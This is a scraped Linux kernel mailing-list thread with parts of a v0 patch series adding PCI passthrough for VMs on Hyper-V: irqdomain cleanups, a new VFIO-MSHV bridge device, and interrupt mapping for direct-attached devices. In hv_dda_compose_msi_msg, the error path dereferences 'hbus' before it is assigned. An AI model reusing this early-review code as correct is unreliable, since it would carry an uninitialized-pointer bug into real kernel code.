hv_init_dev_msi_info(struct device *dev, struct irq_domain *domain, - struct irq_domain *real_parent, struct msi_domain_info *info) + struct irq_domain *real_parent, + struct msi_domain_info *info) { struct irq_chip *chip = info->chip; @@ -317,7 +323,8 @@ static bool hv_init_dev_msi_info(struct device *dev, struct irq_domain *domain, } #define HV_MSI_FLAGS_SUPPORTED (MSI_GENERIC_FLAGS_MASK | MSI_FLAG_PCI_MSIX) -#define HV_MSI_FLAGS_REQUIRED (MSI_FLAG_USE_DEF_DOM_OPS | MSI_FLAG_USE_DEF_CHIP_OPS) +#define HV_MSI_FLAGS_REQUIRED (MSI_FLAG_USE_DEF_DOM_OPS | \ + MSI_FLAG_USE_DEF_CHIP_OPS) static struct msi_parent_ops hv_msi_parent_ops = { .supported_flags = HV_MSI_FLAGS_SUPPORTED, @@ -329,14 +336,13 @@ static struct msi_parent_ops hv_msi_parent_ops = { .init_dev_msi_info = hv_init_dev_msi_info, }; -static int hv_msi_domain_alloc(struct irq_domain *d, unsigned int virq, unsigned int nr_irqs, - void *arg) +static int hv_msi_domain_alloc(struct irq_domain *d, unsigned int virq, + unsigned int nr_irqs, void *arg) { /* - * TODO: The allocation bits of hv_irq_compose_msi_msg(), i.e. everything except - * entry_to_msi_msg() should be in here. + * TODO: The allocation bits of hv_irq_compose_msi_msg(), i.e. + * everything except entry_to_msi_msg() should be in here. */ - int ret; ret = irq_domain_alloc_irqs_parent(d, virq, nr_irqs, arg); @@ -344,13 +350,15 @@ static int hv_msi_domain_alloc(struct irq_domain *d, unsigned int virq, unsigned return ret; for (int i = 0; i < nr_irqs; ++i) { - irq_domain_set_info(d, virq + i, 0, &hv_pci_msi_controller, NULL, - handle_edge_irq, NULL, "edge"); + irq_domain_set_info(d, virq + i, 0, &hv_pci_msi_controller, + NULL, handle_edge_irq, NULL, "edge"); } + return 0; } -static void hv_msi_domain_free(struct irq_domain *d, unsigned int virq, unsigned int nr_irqs) +static void hv_msi_domain_free(struct irq_domain *d, unsigned int virq, + unsigned int nr_irqs) { for (int i = 0; i < nr_irqs; ++i) { struct irq_data *irqd = irq_domain_get_irq_data(d, virq); @@ -362,6 +370,7 @@ static void hv_msi_domain_free(struct irq_domain *d, unsigned int virq, unsigned hv_teardown_msi_irq(to_pci_dev(desc->dev), irqd); } + irq_domain_free_irqs_top(d, virq, nr_irqs); } @@ -394,25 +403,25 @@ struct irq_domain * __init hv_create_pci_msi_domain(void) int hv_unmap_ioapic_interrupt(int ioapic_id, struct hv_interrupt_entry *entry) { - union hv_device_id device_id; + union hv_device_id hv_devid; - device_id.as_uint64 = 0; - device_id.device_type = HV_DEVICE_TYPE_IOAPIC; - device_id.ioapic.ioapic_id = (u8)ioapic_id; + hv_devid.as_uint64 = 0; + hv_devid.device_type = HV_DEVICE_TYPE_IOAPIC; + hv_devid.ioapic.ioapic_id = (u8)ioapic_id; - return hv_unmap_interrupt(device_id.as_uint64, entry); + return hv_unmap_interrupt(hv_devid.as_uint64, entry); } EXPORT_SYMBOL_GPL(hv_unmap_ioapic_interrupt); int hv_map_ioapic_interrupt(int ioapic_id, bool level, int cpu, int vector, struct hv_interrupt_entry *entry) { - union hv_device_id device_id; + union hv_device_id hv_devid; - device_id.as_uint64 = 0; - device_id.device_type = HV_DEVICE_TYPE_IOAPIC; - device_id.ioapic.ioapic_id = (u8)ioapic_id; + hv_devid.as_uint64 = 0; + hv_devid.device_type = HV_DEVICE_TYPE_IOAPIC; + hv_devid.ioapic.ioapic_id = (u8)ioapic_id; - return hv_map_interrupt(device_id, level, cpu, vector, entry); + return hv_map_interrupt(hv_devid, level, cpu, vector, entry); } EXPORT_SYMBOL_GPL(hv_map_ioapic_interrupt); -- 2.51.2.vfs.0.1
{ "author": "Mukesh R <mrathor@linux.microsoft.com>", "date": "Mon, 19 Jan 2026 22:42:17 -0800", "thread_id": "aYDROXpR5kvlylGG@skinsburskii.localdomain.mbox.gz" }
lkml
[PATCH v0 00/15] PCI passthru on Hyper-V (Part I)
From: Mukesh Rathor <mrathor@linux.microsoft.com> Implement passthru of PCI devices to unprivileged virtual machines (VMs) when Linux is running as a privileged VM on Microsoft Hyper-V hypervisor. This support is made to fit within the workings of VFIO framework, and any VMM needing to use it must use the VFIO subsystem. This supports both full device passthru and SR-IOV based VFs. There are 3 cases where Linux can run as a privileged VM (aka MSHV): Baremetal root (meaning Hyper-V+Linux), L1VH, and Nested. At a high level, the hypervisor supports traditional mapped iommu domains that use explicit map and unmap hypercalls for mapping and unmapping guest RAM into the iommu subsystem. Hyper-V also has a concept of direct attach devices whereby the iommu subsystem simply uses the guest HW page table (ept/npt/..). This series adds support for both, and both are made to work in VFIO type1 subsystem. While this Part I focuses on memory mappings, upcoming Part II will focus on irq bypass along with some minor irq remapping updates. This patch series was tested using Cloud Hypervisor verion 48. Qemu support of MSHV is in the works, and that will be extended to include PCI passthru and SR-IOV support also in near future. Based on: 8f0b4cce4481 (origin/hyperv-next) Thanks, -Mukesh Mukesh Rathor (15): iommu/hyperv: rename hyperv-iommu.c to hyperv-irq.c x86/hyperv: cosmetic changes in irqdomain.c for readability x86/hyperv: add insufficient memory support in irqdomain.c mshv: Provide a way to get partition id if running in a VMM process mshv: Declarations and definitions for VFIO-MSHV bridge device mshv: Implement mshv bridge device for VFIO mshv: Add ioctl support for MSHV-VFIO bridge device PCI: hv: rename hv_compose_msi_msg to hv_vmbus_compose_msi_msg mshv: Import data structs around device domains and irq remapping PCI: hv: Build device id for a VMBus device x86/hyperv: Build logical device ids for PCI passthru hcalls x86/hyperv: Implement hyperv virtual iommu x86/hyperv: Basic interrupt support for direct attached devices mshv: Remove mapping of mmio space during map user ioctl mshv: Populate mmio mappings for PCI passthru MAINTAINERS | 1 + arch/arm64/include/asm/mshyperv.h | 15 + arch/x86/hyperv/irqdomain.c | 314 ++++++--- arch/x86/include/asm/mshyperv.h | 21 + arch/x86/kernel/pci-dma.c | 2 + drivers/hv/Makefile | 3 +- drivers/hv/mshv_root.h | 24 + drivers/hv/mshv_root_main.c | 296 +++++++- drivers/hv/mshv_vfio.c | 210 ++++++ drivers/iommu/Kconfig | 1 + drivers/iommu/Makefile | 2 +- drivers/iommu/hyperv-iommu.c | 1004 +++++++++++++++++++++------ drivers/iommu/hyperv-irq.c | 330 +++++++++ drivers/pci/controller/pci-hyperv.c | 207 ++++-- include/asm-generic/mshyperv.h | 1 + include/hyperv/hvgdk_mini.h | 11 + include/hyperv/hvhdk_mini.h | 112 +++ include/linux/hyperv.h | 6 + include/uapi/linux/mshv.h | 31 + 19 files changed, 2182 insertions(+), 409 deletions(-) create mode 100644 drivers/hv/mshv_vfio.c create mode 100644 drivers/iommu/hyperv-irq.c -- 2.51.2.vfs.0.1
From: Mukesh Rathor <mrathor@linux.microsoft.com> Add a new file to implement VFIO-MSHV bridge pseudo device. These functions are called in the VFIO framework, and credits to kvm/vfio.c as this file was adapted from it. Original author: Wei Liu <wei.liu@kernel.org> (Slightly modified from the original version). Signed-off-by: Mukesh Rathor <mrathor@linux.microsoft.com> --- drivers/hv/Makefile | 3 +- drivers/hv/mshv_vfio.c | 210 +++++++++++++++++++++++++++++++++++++++++ 2 files changed, 212 insertions(+), 1 deletion(-) create mode 100644 drivers/hv/mshv_vfio.c diff --git a/drivers/hv/Makefile b/drivers/hv/Makefile index a49f93c2d245..eae003c4cb8f 100644 --- a/drivers/hv/Makefile +++ b/drivers/hv/Makefile @@ -14,7 +14,8 @@ hv_vmbus-y := vmbus_drv.o \ hv_vmbus-$(CONFIG_HYPERV_TESTING) += hv_debugfs.o hv_utils-y := hv_util.o hv_kvp.o hv_snapshot.o hv_utils_transport.o mshv_root-y := mshv_root_main.o mshv_synic.o mshv_eventfd.o mshv_irq.o \ - mshv_root_hv_call.o mshv_portid_table.o mshv_regions.o + mshv_root_hv_call.o mshv_portid_table.o mshv_regions.o \ + mshv_vfio.o mshv_vtl-y := mshv_vtl_main.o # Code that must be built-in diff --git a/drivers/hv/mshv_vfio.c b/drivers/hv/mshv_vfio.c new file mode 100644 index 000000000000..6ea4d99a3bd2 --- /dev/null +++ b/drivers/hv/mshv_vfio.c @@ -0,0 +1,210 @@ +// SPDX-License-Identifier: GPL-2.0-only +/* + * VFIO-MSHV bridge pseudo device + * + * Heavily inspired by the VFIO-KVM bridge pseudo device. + */ +#include <linux/errno.h> +#include <linux/file.h> +#include <linux/list.h> +#include <linux/module.h> +#include <linux/mutex.h> +#include <linux/slab.h> +#include <linux/vfio.h> + +#include "mshv.h" +#include "mshv_root.h" + +struct mshv_vfio_file { + struct list_head node; + struct file *file; /* list of struct mshv_vfio_file */ +}; + +struct mshv_vfio { + struct list_head file_list; + struct mutex lock; +}; + +static bool mshv_vfio_file_is_valid(struct file *file) +{ + bool (*fn)(struct file *file); + bool ret; + + fn = symbol_get(vfio_file_is_valid); + if (!fn) + return false; + + ret = fn(file); + + symbol_put(vfio_file_is_valid); + + return ret; +} + +static long mshv_vfio_file_add(struct mshv_device *mshvdev, unsigned int fd) +{ + struct mshv_vfio *mshv_vfio = mshvdev->device_private; + struct mshv_vfio_file *mvf; + struct file *filp; + long ret = 0; + + filp = fget(fd); + if (!filp) + return -EBADF; + + /* Ensure the FD is a vfio FD. */ + if (!mshv_vfio_file_is_valid(filp)) { + ret = -EINVAL; + goto out_fput; + } + + mutex_lock(&mshv_vfio->lock); + + list_for_each_entry(mvf, &mshv_vfio->file_list, node) { + if (mvf->file == filp) { + ret = -EEXIST; + goto out_unlock; + } + } + + mvf = kzalloc(sizeof(*mvf), GFP_KERNEL_ACCOUNT); + if (!mvf) { + ret = -ENOMEM; + goto out_unlock; + } + + mvf->file = get_file(filp); + list_add_tail(&mvf->node, &mshv_vfio->file_list); + +out_unlock: + mutex_unlock(&mshv_vfio->lock); +out_fput: + fput(filp); + return ret; +} + +static long mshv_vfio_file_del(struct mshv_device *mshvdev, unsigned int fd) +{ + struct mshv_vfio *mshv_vfio = mshvdev->device_private; + struct mshv_vfio_file *mvf; + long ret; + + CLASS(fd, f)(fd); + + if (fd_empty(f)) + return -EBADF; + + ret = -ENOENT; + mutex_lock(&mshv_vfio->lock); + + list_for_each_entry(mvf, &mshv_vfio->file_list, node) { + if (mvf->file != fd_file(f)) + continue; + + list_del(&mvf->node); + fput(mvf->file); + kfree(mvf); + ret = 0; + break; + } + + mutex_unlock(&mshv_vfio->lock); + return ret; +} + +static long mshv_vfio_set_file(struct mshv_device *mshvdev, long attr, + void __user *arg) +{ + int32_t __user *argp = arg; + int32_t fd; + + switch (attr) { + case MSHV_DEV_VFIO_FILE_ADD: + if (get_user(fd, argp)) + return -EFAULT; + return mshv_vfio_file_add(mshvdev, fd); + + case MSHV_DEV_VFIO_FILE_DEL: + if (get_user(fd, argp)) + return -EFAULT; + return mshv_vfio_file_del(mshvdev, fd); + } + + return -ENXIO; +} + +static long mshv_vfio_set_attr(struct mshv_device *mshvdev, + struct mshv_device_attr *attr) +{ + switch (attr->group) { + case MSHV_DEV_VFIO_FILE: + return mshv_vfio_set_file(mshvdev, attr->attr, + u64_to_user_ptr(attr->addr)); + } + + return -ENXIO; +} + +static long mshv_vfio_has_attr(struct mshv_device *mshvdev, + struct mshv_device_attr *attr) +{ + switch (attr->group) { + case MSHV_DEV_VFIO_FILE: + switch (attr->attr) { + case MSHV_DEV_VFIO_FILE_ADD: + case MSHV_DEV_VFIO_FILE_DEL: + return 0; + } + + break; + } + + return -ENXIO; +} + +static long mshv_vfio_create_device(struct mshv_device *mshvdev, u32 type) +{ + struct mshv_device *tmp; + struct mshv_vfio *mshv_vfio; + + /* Only one VFIO "device" per VM */ + hlist_for_each_entry(tmp, &mshvdev->device_pt->pt_devices, + device_ptnode) + if (tmp->device_ops == &mshv_vfio_device_ops) + return -EBUSY; + + mshv_vfio = kzalloc(sizeof(*mshv_vfio), GFP_KERNEL_ACCOUNT); + if (mshv_vfio == NULL) + return -ENOMEM; + + INIT_LIST_HEAD(&mshv_vfio->file_list); + mutex_init(&mshv_vfio->lock); + + mshvdev->device_private = mshv_vfio; + + return 0; +} + +/* This is called from mshv_device_fop_release() */ +static void mshv_vfio_release_device(struct mshv_device *mshvdev) +{ + struct mshv_vfio *mv = mshvdev->device_private; + struct mshv_vfio_file *mvf, *tmp; + + list_for_each_entry_safe(mvf, tmp, &mv->file_list, node) { + fput(mvf->file); + list_del(&mvf->node); + kfree(mvf); + } + + kfree(mv); + kfree(mshvdev); +} + +struct mshv_device_ops mshv_vfio_device_ops = { + .device_name = "mshv-vfio", + .device_create = mshv_vfio_create_device, + .device_release = mshv_vfio_release_device, + .device_set_attr = mshv_vfio_set_attr, + .device_has_attr = mshv_vfio_has_attr, +}; -- 2.51.2.vfs.0.1
{ "author": "Mukesh R <mrathor@linux.microsoft.com>", "date": "Mon, 19 Jan 2026 22:42:21 -0800", "thread_id": "aYDROXpR5kvlylGG@skinsburskii.localdomain.mbox.gz" }
lkml
[PATCH v0 00/15] PCI passthru on Hyper-V (Part I)
From: Mukesh Rathor <mrathor@linux.microsoft.com> Implement passthru of PCI devices to unprivileged virtual machines (VMs) when Linux is running as a privileged VM on Microsoft Hyper-V hypervisor. This support is made to fit within the workings of VFIO framework, and any VMM needing to use it must use the VFIO subsystem. This supports both full device passthru and SR-IOV based VFs. There are 3 cases where Linux can run as a privileged VM (aka MSHV): Baremetal root (meaning Hyper-V+Linux), L1VH, and Nested. At a high level, the hypervisor supports traditional mapped iommu domains that use explicit map and unmap hypercalls for mapping and unmapping guest RAM into the iommu subsystem. Hyper-V also has a concept of direct attach devices whereby the iommu subsystem simply uses the guest HW page table (ept/npt/..). This series adds support for both, and both are made to work in VFIO type1 subsystem. While this Part I focuses on memory mappings, upcoming Part II will focus on irq bypass along with some minor irq remapping updates. This patch series was tested using Cloud Hypervisor verion 48. Qemu support of MSHV is in the works, and that will be extended to include PCI passthru and SR-IOV support also in near future. Based on: 8f0b4cce4481 (origin/hyperv-next) Thanks, -Mukesh Mukesh Rathor (15): iommu/hyperv: rename hyperv-iommu.c to hyperv-irq.c x86/hyperv: cosmetic changes in irqdomain.c for readability x86/hyperv: add insufficient memory support in irqdomain.c mshv: Provide a way to get partition id if running in a VMM process mshv: Declarations and definitions for VFIO-MSHV bridge device mshv: Implement mshv bridge device for VFIO mshv: Add ioctl support for MSHV-VFIO bridge device PCI: hv: rename hv_compose_msi_msg to hv_vmbus_compose_msi_msg mshv: Import data structs around device domains and irq remapping PCI: hv: Build device id for a VMBus device x86/hyperv: Build logical device ids for PCI passthru hcalls x86/hyperv: Implement hyperv virtual iommu x86/hyperv: Basic interrupt support for direct attached devices mshv: Remove mapping of mmio space during map user ioctl mshv: Populate mmio mappings for PCI passthru MAINTAINERS | 1 + arch/arm64/include/asm/mshyperv.h | 15 + arch/x86/hyperv/irqdomain.c | 314 ++++++--- arch/x86/include/asm/mshyperv.h | 21 + arch/x86/kernel/pci-dma.c | 2 + drivers/hv/Makefile | 3 +- drivers/hv/mshv_root.h | 24 + drivers/hv/mshv_root_main.c | 296 +++++++- drivers/hv/mshv_vfio.c | 210 ++++++ drivers/iommu/Kconfig | 1 + drivers/iommu/Makefile | 2 +- drivers/iommu/hyperv-iommu.c | 1004 +++++++++++++++++++++------ drivers/iommu/hyperv-irq.c | 330 +++++++++ drivers/pci/controller/pci-hyperv.c | 207 ++++-- include/asm-generic/mshyperv.h | 1 + include/hyperv/hvgdk_mini.h | 11 + include/hyperv/hvhdk_mini.h | 112 +++ include/linux/hyperv.h | 6 + include/uapi/linux/mshv.h | 31 + 19 files changed, 2182 insertions(+), 409 deletions(-) create mode 100644 drivers/hv/mshv_vfio.c create mode 100644 drivers/iommu/hyperv-irq.c -- 2.51.2.vfs.0.1
From: Mukesh Rathor <mrathor@linux.microsoft.com> As mentioned previously, a direct attached device must be referenced via logical device id which is formed in the initial attach hypercall. Interrupt mapping paths for direct attached devices are almost same, except we must use logical device ids instead of the PCI device ids. L1VH only supports direct attaches for passing thru devices to its guests, and devices on L1VH are VMBus based. However, the interrupts are mapped via the map interrupt hypercall and not the traditional method of VMBus messages. Partition id for the relevant hypercalls is tricky. This because a device could be moving from root to guest and then back to the root. In case of L1VH, it could be moving from system host to L1VH root to a guest, then back to the L1VH root. So, it is carefully crafted by keeping track of whether the call is on behalf of a VMM process, whether the device is attached device (as opposed to mapped), and whether we are in an L1VH root/parent. If VMM process, we assume it is on behalf of a guest. Otherwise, the device is being attached or detached during boot or shutdown of the privileged partition. Lastly, a dummy cpu and vector is used to map interrupt for a direct attached device. This because, once a device is marked for direct attach, hypervisor will not let any interrupts be mapped to host. So it is mapped to guest dummy cpu and dummy vector. This is then correctly mapped during guest boot via the retarget paths. Signed-off-by: Mukesh Rathor <mrathor@linux.microsoft.com> --- arch/arm64/include/asm/mshyperv.h | 15 +++++ arch/x86/hyperv/irqdomain.c | 57 +++++++++++++----- arch/x86/include/asm/mshyperv.h | 4 ++ drivers/pci/controller/pci-hyperv.c | 91 +++++++++++++++++++++++++---- 4 files changed, 142 insertions(+), 25 deletions(-) diff --git a/arch/arm64/include/asm/mshyperv.h b/arch/arm64/include/asm/mshyperv.h index b721d3134ab6..27da480f94f6 100644 --- a/arch/arm64/include/asm/mshyperv.h +++ b/arch/arm64/include/asm/mshyperv.h @@ -53,6 +53,21 @@ static inline u64 hv_get_non_nested_msr(unsigned int reg) return hv_get_msr(reg); } +struct irq_data; +struct msi_msg; +struct pci_dev; +static inline void hv_irq_compose_msi_msg(struct irq_data *data, + struct msi_msg *msg) {}; +static inline int hv_unmap_msi_interrupt(struct pci_dev *pdev, + struct hv_interrupt_entry *hvirqe) +{ + return -EOPNOTSUPP; +} +static inline bool hv_pcidev_is_attached_dev(struct pci_dev *pdev) +{ + return false; +} + /* SMCCC hypercall parameters */ #define HV_SMCCC_FUNC_NUMBER 1 #define HV_FUNC_ID ARM_SMCCC_CALL_VAL( \ diff --git a/arch/x86/hyperv/irqdomain.c b/arch/x86/hyperv/irqdomain.c index 33017aa0caa4..e6eb457f791e 100644 --- a/arch/x86/hyperv/irqdomain.c +++ b/arch/x86/hyperv/irqdomain.c @@ -13,6 +13,16 @@ #include <linux/irqchip/irq-msi-lib.h> #include <asm/mshyperv.h> +/* + * For direct attached devices (which use logical device ids), hypervisor will + * not allow mappings to host. But VFIO needs to bind the interrupt at the very + * start before the guest cpu/vector is known. So we use dummy cpu and vector + * to bind in such case, and later when the guest starts, retarget will move it + * to correct guest cpu and vector. + */ +#define HV_DDA_DUMMY_CPU 0 +#define HV_DDA_DUMMY_VECTOR 32 + static u64 hv_map_interrupt_hcall(u64 ptid, union hv_device_id hv_devid, bool level, int cpu, int vector, struct hv_interrupt_entry *ret_entry) @@ -24,6 +34,11 @@ static u64 hv_map_interrupt_hcall(u64 ptid, union hv_device_id hv_devid, u64 status; int nr_bank, var_size; + if (hv_devid.device_type == HV_DEVICE_TYPE_LOGICAL) { + cpu = HV_DDA_DUMMY_CPU; + vector = HV_DDA_DUMMY_VECTOR; + } + local_irq_save(flags); input = *this_cpu_ptr(hyperv_pcpu_input_arg); @@ -95,7 +110,8 @@ static int hv_map_interrupt(u64 ptid, union hv_device_id device_id, bool level, return hv_result_to_errno(status); } -static int hv_unmap_interrupt(u64 id, struct hv_interrupt_entry *irq_entry) +static int hv_unmap_interrupt(union hv_device_id hv_devid, + struct hv_interrupt_entry *irq_entry) { unsigned long flags; struct hv_input_unmap_device_interrupt *input; @@ -103,10 +119,14 @@ static int hv_unmap_interrupt(u64 id, struct hv_interrupt_entry *irq_entry) local_irq_save(flags); input = *this_cpu_ptr(hyperv_pcpu_input_arg); - memset(input, 0, sizeof(*input)); - input->partition_id = hv_current_partition_id; - input->device_id = id; + + if (hv_devid.device_type == HV_DEVICE_TYPE_LOGICAL) + input->partition_id = hv_iommu_get_curr_partid(); + else + input->partition_id = hv_current_partition_id; + + input->device_id = hv_devid.as_uint64; input->interrupt_entry = *irq_entry; status = hv_do_hypercall(HVCALL_UNMAP_DEVICE_INTERRUPT, input, NULL); @@ -263,6 +283,7 @@ static u64 hv_build_irq_devid(struct pci_dev *pdev) int hv_map_msi_interrupt(struct irq_data *data, struct hv_interrupt_entry *out_entry) { + u64 ptid; struct irq_cfg *cfg = irqd_cfg(data); struct hv_interrupt_entry dummy; union hv_device_id hv_devid; @@ -275,8 +296,17 @@ int hv_map_msi_interrupt(struct irq_data *data, hv_devid.as_uint64 = hv_build_irq_devid(pdev); cpu = cpumask_first(irq_data_get_effective_affinity_mask(data)); - return hv_map_interrupt(hv_current_partition_id, hv_devid, false, cpu, - cfg->vector, out_entry ? out_entry : &dummy); + if (hv_devid.device_type == HV_DEVICE_TYPE_LOGICAL) + if (hv_pcidev_is_attached_dev(pdev)) + ptid = hv_iommu_get_curr_partid(); + else + /* Device actually on l1vh root, not passthru'd to vm */ + ptid = hv_current_partition_id; + else + ptid = hv_current_partition_id; + + return hv_map_interrupt(ptid, hv_devid, false, cpu, cfg->vector, + out_entry ? out_entry : &dummy); } EXPORT_SYMBOL_GPL(hv_map_msi_interrupt); @@ -289,10 +319,7 @@ static void entry_to_msi_msg(struct hv_interrupt_entry *entry, msg->data = entry->msi_entry.data.as_uint32; } -static int hv_unmap_msi_interrupt(struct pci_dev *pdev, - struct hv_interrupt_entry *irq_entry); - -static void hv_irq_compose_msi_msg(struct irq_data *data, struct msi_msg *msg) +void hv_irq_compose_msi_msg(struct irq_data *data, struct msi_msg *msg) { struct hv_interrupt_entry *stored_entry; struct irq_cfg *cfg = irqd_cfg(data); @@ -341,16 +368,18 @@ static void hv_irq_compose_msi_msg(struct irq_data *data, struct msi_msg *msg) data->chip_data = stored_entry; entry_to_msi_msg(data->chip_data, msg); } +EXPORT_SYMBOL_GPL(hv_irq_compose_msi_msg); -static int hv_unmap_msi_interrupt(struct pci_dev *pdev, - struct hv_interrupt_entry *irq_entry) +int hv_unmap_msi_interrupt(struct pci_dev *pdev, + struct hv_interrupt_entry *irq_entry) { union hv_device_id hv_devid; hv_devid.as_uint64 = hv_build_irq_devid(pdev); - return hv_unmap_interrupt(hv_devid.as_uint64, irq_entry); + return hv_unmap_interrupt(hv_devid, irq_entry); } +EXPORT_SYMBOL_GPL(hv_unmap_msi_interrupt); /* NB: during map, hv_interrupt_entry is saved via data->chip_data */ static void hv_teardown_msi_irq(struct pci_dev *pdev, struct irq_data *irqd) @@ -486,7 +515,7 @@ int hv_unmap_ioapic_interrupt(int ioapic_id, struct hv_interrupt_entry *entry) hv_devid.device_type = HV_DEVICE_TYPE_IOAPIC; hv_devid.ioapic.ioapic_id = (u8)ioapic_id; - return hv_unmap_interrupt(hv_devid.as_uint64, entry); + return hv_unmap_interrupt(hv_devid, entry); } EXPORT_SYMBOL_GPL(hv_unmap_ioapic_interrupt); diff --git a/arch/x86/include/asm/mshyperv.h b/arch/x86/include/asm/mshyperv.h index e4ccdbbf1d12..b6facd3a0f5e 100644 --- a/arch/x86/include/asm/mshyperv.h +++ b/arch/x86/include/asm/mshyperv.h @@ -204,11 +204,15 @@ static inline u64 hv_iommu_get_curr_partid(void) #endif /* CONFIG_HYPERV_IOMMU */ u64 hv_pci_vmbus_device_id(struct pci_dev *pdev); +void hv_irq_compose_msi_msg(struct irq_data *data, struct msi_msg *msg); +extern bool hv_no_attdev; struct irq_domain *hv_create_pci_msi_domain(void); int hv_map_msi_interrupt(struct irq_data *data, struct hv_interrupt_entry *out_entry); +int hv_unmap_msi_interrupt(struct pci_dev *dev, + struct hv_interrupt_entry *hvirqe); int hv_map_ioapic_interrupt(int ioapic_id, bool level, int vcpu, int vector, struct hv_interrupt_entry *entry); int hv_unmap_ioapic_interrupt(int ioapic_id, struct hv_interrupt_entry *entry); diff --git a/drivers/pci/controller/pci-hyperv.c b/drivers/pci/controller/pci-hyperv.c index 40f0b06bb966..71d1599dc4a8 100644 --- a/drivers/pci/controller/pci-hyperv.c +++ b/drivers/pci/controller/pci-hyperv.c @@ -660,15 +660,17 @@ static void hv_irq_retarget_interrupt(struct irq_data *data) params = *this_cpu_ptr(hyperv_pcpu_input_arg); memset(params, 0, sizeof(*params)); - params->partition_id = HV_PARTITION_ID_SELF; + + if (hv_pcidev_is_attached_dev(pdev)) + params->partition_id = hv_iommu_get_curr_partid(); + else + params->partition_id = HV_PARTITION_ID_SELF; + params->int_entry.source = HV_INTERRUPT_SOURCE_MSI; - params->int_entry.msi_entry.address.as_uint32 = int_desc->address & 0xffffffff; + params->int_entry.msi_entry.address.as_uint32 = + int_desc->address & 0xffffffff; params->int_entry.msi_entry.data.as_uint32 = int_desc->data; - params->device_id = (hbus->hdev->dev_instance.b[5] << 24) | - (hbus->hdev->dev_instance.b[4] << 16) | - (hbus->hdev->dev_instance.b[7] << 8) | - (hbus->hdev->dev_instance.b[6] & 0xf8) | - PCI_FUNC(pdev->devfn); + params->device_id = hv_pci_vmbus_device_id(pdev); params->int_target.vector = hv_msi_get_int_vector(data); if (hbus->protocol_version >= PCI_PROTOCOL_VERSION_1_2) { @@ -1263,6 +1265,15 @@ static void _hv_pcifront_read_config(struct hv_pci_dev *hpdev, int where, mb(); } spin_unlock_irqrestore(&hbus->config_lock, flags); + /* + * Make sure PCI_INTERRUPT_PIN is hard-wired to 0 since it may + * be read using a 32bit read which is skipped by the above + * emulation. + */ + if (PCI_INTERRUPT_PIN >= where && + PCI_INTERRUPT_PIN <= (where + size)) { + *((char *)val + PCI_INTERRUPT_PIN - where) = 0; + } } else { dev_err(dev, "Attempt to read beyond a function's config space.\n"); } @@ -1731,14 +1742,22 @@ static void hv_msi_free(struct irq_domain *domain, unsigned int irq) if (!int_desc) return; - irq_data->chip_data = NULL; hpdev = get_pcichild_wslot(hbus, devfn_to_wslot(pdev->devfn)); if (!hpdev) { + irq_data->chip_data = NULL; kfree(int_desc); return; } - hv_int_desc_free(hpdev, int_desc); + if (hv_pcidev_is_attached_dev(pdev)) { + hv_unmap_msi_interrupt(pdev, irq_data->chip_data); + kfree(irq_data->chip_data); + irq_data->chip_data = NULL; + } else { + irq_data->chip_data = NULL; + hv_int_desc_free(hpdev, int_desc); + } + put_pcichild(hpdev); } @@ -2139,6 +2158,56 @@ static void hv_vmbus_compose_msi_msg(struct irq_data *data, struct msi_msg *msg) msg->data = 0; } +/* Compose an msi message for a directly attached device */ +static void hv_dda_compose_msi_msg(struct irq_data *irq_data, + struct msi_desc *msi_desc, + struct msi_msg *msg) +{ + bool multi_msi; + struct hv_pcibus_device *hbus; + struct hv_pci_dev *hpdev; + struct pci_dev *pdev = msi_desc_to_pci_dev(msi_desc); + + multi_msi = !msi_desc->pci.msi_attrib.is_msix && + msi_desc->nvec_used > 1; + + if (multi_msi) { + dev_err(&hbus->hdev->device, + "Passthru direct attach does not support multi msi\n"); + goto outerr; + } + + hbus = container_of(pdev->bus->sysdata, struct hv_pcibus_device, + sysdata); + + hpdev = get_pcichild_wslot(hbus, devfn_to_wslot(pdev->devfn)); + if (!hpdev) + goto outerr; + + /* will unmap if needed and also update irq_data->chip_data */ + hv_irq_compose_msi_msg(irq_data, msg); + + put_pcichild(hpdev); + return; + +outerr: + memset(msg, 0, sizeof(*msg)); +} + +static void hv_compose_msi_msg(struct irq_data *data, struct msi_msg *msg) +{ + struct pci_dev *pdev; + struct msi_desc *msi_desc; + + msi_desc = irq_data_get_msi_desc(data); + pdev = msi_desc_to_pci_dev(msi_desc); + + if (hv_pcidev_is_attached_dev(pdev)) + hv_dda_compose_msi_msg(data, msi_desc, msg); + else + hv_vmbus_compose_msi_msg(data, msg); +} + static bool hv_pcie_init_dev_msi_info(struct device *dev, struct irq_domain *domain, struct irq_domain *real_parent, struct msi_domain_info *info) { @@ -2177,7 +2246,7 @@ static const struct msi_parent_ops hv_pcie_msi_parent_ops = { /* HW Interrupt Chip Descriptor */ static struct irq_chip hv_msi_irq_chip = { .name = "Hyper-V PCIe MSI", - .irq_compose_msi_msg = hv_vmbus_compose_msi_msg, + .irq_compose_msi_msg = hv_compose_msi_msg, .irq_set_affinity = irq_chip_set_affinity_parent, .irq_ack = irq_chip_ack_parent, .irq_eoi = irq_chip_eoi_parent, @@ -4096,7 +4165,7 @@ static int hv_pci_restore_msi_msg(struct pci_dev *pdev, void *arg) irq_data = irq_get_irq_data(entry->irq); if (WARN_ON_ONCE(!irq_data)) return -EINVAL; - hv_vmbus_compose_msi_msg(irq_data, &entry->msg); + hv_compose_msi_msg(irq_data, &entry->msg); } return 0; } -- 2.51.2.vfs.0.1
{ "author": "Mukesh R <mrathor@linux.microsoft.com>", "date": "Mon, 19 Jan 2026 22:42:28 -0800", "thread_id": "aYDROXpR5kvlylGG@skinsburskii.localdomain.mbox.gz" }
lkml
[PATCH v0 00/15] PCI passthru on Hyper-V (Part I)
From: Mukesh Rathor <mrathor@linux.microsoft.com> Implement passthru of PCI devices to unprivileged virtual machines (VMs) when Linux is running as a privileged VM on Microsoft Hyper-V hypervisor. This support is made to fit within the workings of VFIO framework, and any VMM needing to use it must use the VFIO subsystem. This supports both full device passthru and SR-IOV based VFs. There are 3 cases where Linux can run as a privileged VM (aka MSHV): Baremetal root (meaning Hyper-V+Linux), L1VH, and Nested. At a high level, the hypervisor supports traditional mapped iommu domains that use explicit map and unmap hypercalls for mapping and unmapping guest RAM into the iommu subsystem. Hyper-V also has a concept of direct attach devices whereby the iommu subsystem simply uses the guest HW page table (ept/npt/..). This series adds support for both, and both are made to work in VFIO type1 subsystem. While this Part I focuses on memory mappings, upcoming Part II will focus on irq bypass along with some minor irq remapping updates. This patch series was tested using Cloud Hypervisor verion 48. Qemu support of MSHV is in the works, and that will be extended to include PCI passthru and SR-IOV support also in near future. Based on: 8f0b4cce4481 (origin/hyperv-next) Thanks, -Mukesh Mukesh Rathor (15): 